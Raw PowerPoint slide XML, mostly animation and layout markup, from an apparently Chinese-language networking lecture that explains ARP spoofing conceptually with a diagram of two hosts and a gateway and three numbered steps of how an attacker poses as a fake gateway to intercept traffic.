                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="80" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26663"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="81" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="82" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0 0 L 0.06302 -0.10486 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="83" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26663"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="0"/>
                                    </p:animMotion>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6664"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="87" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="266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665"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="90" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="266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666"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="93" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26666"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="94" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="95" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="2" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.06302 -0.10486 L -0.21667 0.00509 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="96" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26663"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-1400000" y="550000"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="97" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.00018 0.00023 L 0.16164 0.12107 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="98" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26666"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="810000" y="600000"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="99" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.00017 0.00024 L 0.38212 0.11019 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="100" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26664"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="1910000" y="550000"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="101" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.00018 0.00023 L -0.02725 -0.22546 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="102" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26665"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-140000" y="-1130000"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="103" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="104" presetID="10" presetClass="exit" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="105" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26639"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="106" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="1999"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="26639"/>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p:cBhvr>
                                        <p:cTn id="108" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26664"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="109" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="1999"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="26664"/>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p:cBhvr>
                                        <p:cTn id="111" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26665"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="112" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="1999"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="26665"/>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p:cBhvr>
                                        <p:cTn id="114" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26666"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="115" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="1999"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="26666"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="116" presetID="10" presetClass="exit" presetSubtype="0" fill="hold" grpId="3" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="117" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26663"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="118" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="1999"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="26663"/>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9" presetClass="entr" presetSubtype="0" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="122" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="26649"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="123" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26649"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-.2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="124" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26649"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect prLst="gradientSize: 0.1">
                                      <p:cBhvr>
                                        <p:cTn id="125"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bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="26638" grpId="0" animBg="1"/>
      <p:bldP spid="26641" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="26642" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="26643" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="26644" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="26645" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="26646" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="26647" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="26647" grpId="1" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="26663" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="26663" grpId="1" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="26663" grpId="2" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="26663" grpId="3" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="26664" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="26664" grpId="1" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="26664" grpId="2" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="26665" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="26665" grpId="1" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="26665" grpId="2" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="26666" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="26666" grpId="1" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="26666" grpId="2" bldLvl="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28625" y="0"/>
            <a:ext cx="7993063" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>欺骗</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217096" name="Freeform 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2088878" y="2253382"/>
            <a:ext cx="4019550" cy="704850"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="422" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="422" y="440"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="2130" y="444"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="2130" y="24"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="2532" y="30"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2532" h="444">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="422" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="422" y="440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2130" y="444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2130" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2532" y="30"/>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08" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1360215" y="2478807"/>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0260.8c01.2222</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72709" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5892528" y="2478807"/>
            <a:ext cx="1198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0260.8c01.3333</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="72710"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634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766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23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1963465" y="1967632"/>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z="1200">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72713" name="Rectangle 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5984603" y="1967632"/>
            <a:ext cx="293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z="1200">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="72714"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203" y="3574182"/>
            <a:ext cx="12954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14" name="Line 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4139928" y="2924895"/>
            <a:ext cx="0" cy="64928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16" name="Rectangle 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3779565" y="4221882"/>
            <a:ext cx="1295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2100"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>网关</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72717" name="Rectangle 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3274740" y="458224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0260.8c01.1111</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72718" name="Rectangle 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1331640" y="270899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10.0.0.2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72719" name="Rectangle 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3274740" y="4869582"/>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10.0.0.1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72720" name="Rectangle 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5867128" y="2782020"/>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pPr>
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>10.0.0.3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217123" name="Line 35"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2482578" y="2061295"/>
            <a:ext cx="3384550" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>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24" name="Rectangle 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="968722" y="944117"/>
            <a:ext cx="6912867" cy="8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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>者在局域网段发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>虚假</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP/MAC&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，篡改网关</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>地址，使自己成为假网关</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217125" name="Rectangle 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="968722" y="3176435"/>
            <a:ext cx="6571529" cy="8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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>受害者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>将数据包发送给假网关（攻击者）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217127" name="Line 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4859065" y="2493095"/>
            <a:ext cx="1152525" cy="1152525"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="0000FF"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>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0" name="Line 42"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2411140" y="1916832"/>
            <a:ext cx="3455988" cy="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1" name="Rectangle 43"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539552" y="4584391"/>
            <a:ext cx="8011242" cy="88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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>假</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>网关（攻击者）分析接收到的数据包</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，提取有价值数据包（如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>QQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
